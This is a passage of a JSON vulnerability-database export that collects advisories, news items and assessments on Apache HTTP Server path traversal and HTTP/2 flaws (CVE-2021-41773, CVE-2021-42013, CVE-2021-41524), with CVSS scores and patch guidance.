This requires a specially crafted request. The vulnerability was recently introduced in version 2.4.49. No exploit is known to the project (CVE-2021-41524). A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by \"require all denied\" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions (CVE-2021-41773). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-06T14:38:41", "type": "mageia", "title": "Updated apache packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524", "CVE-2021-41773"], "modified": "2021-10-06T14:38:41", "id": "MGASA-2021-0461", "href": "https://advisories.mageia.org/MGASA-2021-0461.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": 
"2022-04-18T11:19:35", "description": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution (CVE-2021-42013). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T19:12:12", "type": "mageia", "title": "Updated apache packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-08T19:12:12", "id": "MGASA-2021-0470", "href": "https://advisories.mageia.org/MGASA-2021-0470.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:37:14", "description": 
"[](<https://thehackernews.com/new-images/img/a/AVvXsEhEkcOGiJJuzgX9o2QOgh1B0OLk6DfE0vDfLNTazcTxOQq17rDeNMkrzD55AKXK2Yqf4fVbhVq-LGf0jODFTpD_1COTLNEcfxOcHoZnz4ZgFhpXfzcSIvQrA08CNNuQQr6-K6gI-xav-mU4-gPaJPVuHJ-AN3yCn1cE70J5y7LBz9Zk1IpvsbCqyHkq>)\n\nApache has issued patches to address two security vulnerabilities, including a path traversal and file disclosure flaw in its HTTP server that it said is being actively exploited in the wild.\n\n\"A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root,\" the open-source project maintainers [noted](<https://httpd.apache.org/security/vulnerabilities_24.html>) in an advisory published Tuesday.\n\n\"If files outside of the document root are not protected by 'require all denied' these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts.\"\n\nThe flaw, tracked as [CVE-2021-41773](<https://nvd.nist.gov/vuln/detail/CVE-2021-41773>), affects only Apache HTTP server version 2.4.49. Ash Daulton and cPanel Security Team have been credited with discovering and reporting the issue on September 29, 2021.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEhq-ZFbYe4ogfL29916B-XMCS8Azo_AXSQRAkFJ-uPYT8Y3Oamz8MeMK9E5KMJNM-453ABtboKaSl1s_gXcFi7fkKhHw7_C-BO0CUS0goVFnR7hPgYsX610L1cvQl5M2s8APgpVCJgz49x0hZ0ks_HiNqVqGCKqqN64MtgIEMFzI9HiJVOgOcSrZ-Qk>) \n--- \nSource: PT SWARM \n \nAlso resolved by Apache is a null pointer dereference vulnerability observed during processing HTTP/2 requests ([CVE-2021-41524](<https://nvd.nist.gov/vuln/detail/CVE-2021-41524>)), thus allowing an adversary to perform a denial-of-service (DoS) attack on the server. 
The non-profit corporation said the weakness was introduced in version 2.4.49.\n\nApache users are [highly recommended](<https://twitter.com/ptswarm/status/1445376079548624899>) to patch as soon as possible to contain the path traversal vulnerability and mitigate any risk associated with active exploitation of the flaw.\n\n### **Update: **Path Traversal Zero-Day in Apache Leads to RCE Attacks\n\nThe actively exploited Apache HTTP server zero-day flaw is far more critical than previously thought, with new proof-of-concept (PoC) exploits indicating that the vulnerability goes beyond path traversal to equip attackers with remote code execution (RCE) abilities. Security researcher Hacker Fantastic, on [Twitter](<https://twitter.com/hackerfantastic/status/1445523524555186189>), [noted](<https://twitter.com/hackerfantastic/status/1445531829985968137>) that the vulnerability is \"in fact also RCE providing mod-cgi is enabled.\"\n\nWill Dormann, vulnerability analyst at CERT/CC, [corroborated](<https://twitter.com/wdormann/status/1445573881121546245>) the findings, adding \"I was not doing anything clever other than just reproducing essentially the public PoC on Windows when I saw calc.exe spawn.\"\n", 
"cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T14:53:00", "type": "thn", "title": "Apache Warns of Zero-Day Exploit in the Wild \u2014 Patch Your Web Servers Now!", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524", "CVE-2021-41773"], "modified": "2021-10-07T05:31:23", "id": "THN:C6F6C1EB007027C65DE14DE5DA3E74BC", "href": "https://thehackernews.com/2021/10/apache-warns-of-zero-day-exploit-in.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-05-09T12:37:13", "description": "The Apache Software Foundation on Thursday released additional security updates for its HTTP Server 
product to remediate what it says is an \"incomplete fix\" for an [actively exploited](<https://thehackernews.com/2021/10/apache-warns-of-zero-day-exploit-in.html>) path traversal and remote code execution flaw that it patched earlier this week.\n\n[CVE-2021-42013](<https://nvd.nist.gov/vuln/detail/CVE-2021-42013>), as the new vulnerability is identified, builds upon [CVE-2021-41773](<https://nvd.nist.gov/vuln/detail/CVE-2021-41773>), a flaw that impacts Apache web servers running version 2.4.49 and involves a [path normalization](<https://en.wikipedia.org/wiki/URI_normalization>) bug that could enable an adversary to access and view arbitrary files stored on a vulnerable server.\n\nAlthough the flaw was addressed by the maintainers in version 2.4.50, a day after the patches were released it became known that the weakness could also be abused to gain remote code execution if the \"mod_cgi\" module was loaded and the configuration \"require all denied\" was absent, prompting Apache to issue another round of emergency updates.\n\n\"It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives,\" the company [noted](<https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2021-42013>) in an advisory. \"If files outside of these directories are not protected by the usual default configuration 'require all denied', these requests can succeed. 
If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution.\"\n\nThe Apache Software Foundation credited Juan Escobar from Dreamlab Technologies, Fernando Mu\u00f1oz from NULL Life CTF Team, and Shungo Kumasaka for reporting the vulnerability. In light of active exploitation, users are highly recommended to update to the latest version (2.4.51) to mitigate the risk associated with the flaw.\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) [said](<https://us-cert.cisa.gov/ncas/current-activity/2021/10/07/apache-releases-http-server-version-2451-address-vulnerabilities>) it's \"seeing ongoing scanning of vulnerable systems, which is expected to accelerate, likely leading to exploitation,\" urging \"organizations to patch immediately if they haven't already.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T04:47:00", "type": "thn", "title": "New Patch Released for Actively Exploited 0-Day Apache Path Traversal to RCE Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", 
"baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-11T02:57:44", "id": "THN:A0816B13A402B9865C624E3CA1B06EA5", "href": "https://thehackernews.com/2021/10/new-patch-released-for-actively.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kaspersky": [{"lastseen": "2022-03-17T07:36:28", "description": "### *Detect date*:\n10/04/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Apache HTTP Server. Malicious users can exploit these vulnerabilities to cause denial of service, execute arbitrary code, obtain sensitive information.\n\n### *Affected products*:\nApache HTTP Server earlier than 2.4.50\n\n### *Solution*:\nUpdate to the latest version \n[Download Apache HTTP Server](<https://httpd.apache.org/download.cgi>)\n\n### *Original advisories*:\n[Fixed in Apache HTTP Server 2.4.50](<https://httpd.apache.org/security/vulnerabilities_24.html#2.4.50>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Apache HTTP Server](<https://threats.kaspersky.com/en/product/Apache-HTTP-Server/>)\n\n### *CVE-IDS*:\n[CVE-2021-41524](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41524>)5.0Critical \n[CVE-2021-41773](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773>)4.3Warning", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-04T00:00:00", "type": "kaspersky", "title": "KLA12371 
Multiple vulnerabilities in Apache HTTP Server", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524", "CVE-2021-41773"], "modified": "2022-03-16T00:00:00", "id": "KLA12371", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12371/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "osv": [{"lastseen": "2022-11-16T00:20:01", "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. 
The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-05T09:15:00", "type": "osv", "title": "CVE-2021-41773", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-11-16T00:19:58", "id": "OSV:CVE-2021-41773", "href": "https://osv.dev/vulnerability/CVE-2021-41773", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-05T20:51:36", "description": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. 
This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-07T16:15:00", "type": "osv", "title": "CVE-2021-42013", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-10-05T18:14:00", "id": "OSV:CVE-2021-42013", "href": "https://osv.dev/vulnerability/CVE-2021-42013", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-28T14:53:31", "description": "While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. This requires a specially crafted request. The vulnerability was recently introduced in version 2.4.49. 
No exploit is known to the project.", "cvss3": {}, "published": "2021-10-05T09:15:00", "type": "osv", "title": "CVE-2021-41524", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-41524"], "modified": "2022-10-28T14:53:27", "id": "OSV:CVE-2021-41524", "href": "https://osv.dev/vulnerability/CVE-2021-41524", "cvss": {"score": 0.0, "vector": "NONE"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. 
The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Apache HTTP Server Path Traversal Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-41773", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Apache HTTP server vulnerabilities allow an attacker to use a path traversal attack to map URLs to files outside the expected document root and perform Remote Code Execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, 
"published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Apache HTTP Server 2.4.49 and 2.4.50 Path Traversal", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-42013", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2021-11-26T19:07:07", "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-15T00:50:08", "type": "fedora", "title": "[SECURITY] Fedora 35 Update: httpd-2.4.51-2.fc35", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-15T00:50:08", "id": "FEDORA:00C4C3098596", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/WS5RVHOIIRECG65ZBTZY7IEJVWQSQPG3/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T19:07:07", "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-12T23:46:03", "type": "fedora", "title": "[SECURITY] Fedora 34 Update: httpd-2.4.51-1.fc34", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-12T23:46:03", "id": "FEDORA:BDD0730B86DF", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/RMIIEFINL6FUIOPD2A3M5XC6DH45Y3CC/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2022-11-03T23:09:44", "description": "A flaw was found in a change made to path normalization in Apache HTTP 
Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \u201crequire all denied\u201d, these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at October 05, 2021 3:29pm UTC reported:\n\nApache doesn\u2019t typically run with root privileges in most environments so the value of this vulnerability will largely be in using it to leak application-specific secrets such as signing keys, database connection strings, source code etc. Path traversal vulnerabilities are among the easiest to exploit and involve no type of corruption, making them very reliable and safe to use multiple times.\n\nThere will likely be evidence within the Apache access logs of exploitation. Filtering on the HTTP status code could also provide insight into what files the attacker was able to successfully leak.\n\n**noraj** at March 31, 2022 6:23pm UTC reported:\n\nApache doesn\u2019t typically run with root privileges in most environments so the value of this vulnerability will largely be in using it to leak application-specific secrets such as signing keys, database connection strings, source code etc. Path traversal vulnerabilities are among the easiest to exploit and involve no type of corruption, making them very reliable and safe to use multiple times.\n\nThere will likely be evidence within the Apache access logs of exploitation. 
Filtering on the HTTP status code could also provide insight into what files the attacker was able to successfully leak.\n\nAssessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-05T00:00:00", "type": "attackerkb", "title": "CVE-2021-41773", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-11-03T00:00:00", "id": "AKB:4BB9D3C7-37EF-4B65-B2A8-550AFC30664C", "href": "https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-17T02:00:34", "description": "Apache HTTPd is a popular open-source HTTP server from the Apache Foundation. \nOn October 8, 2021, the Apache HTTPd project released a security update disclosing CVE-2021-42013, a path traversal vulnerability in Apache HTTPd 2.4.49/2.4.50. 
Because the fix for CVE-2021-41773, the Apache HTTPd 2.4.49 path traversal vulnerability, was incomplete, an attacker can craft malicious requests that bypass the patch and use the traversal flaw to read files outside the web directory. In addition, if CGI support is enabled in Apache HTTPd, an attacker can craft malicious requests to execute commands and take control of the server. The Alibaba Cloud Emergency Response Center reminds Apache HTTPd users to take security measures as soon as possible to block attacks exploiting the vulnerability.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-11T00:00:00", "type": "attackerkb", "title": "Apache HTTPd 2.4.49/2.4.50 Path Traversal Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-11T00:00:00", "id": "AKB:61971866-F0B5-4317-8AF4-C4E4C23279F1", 
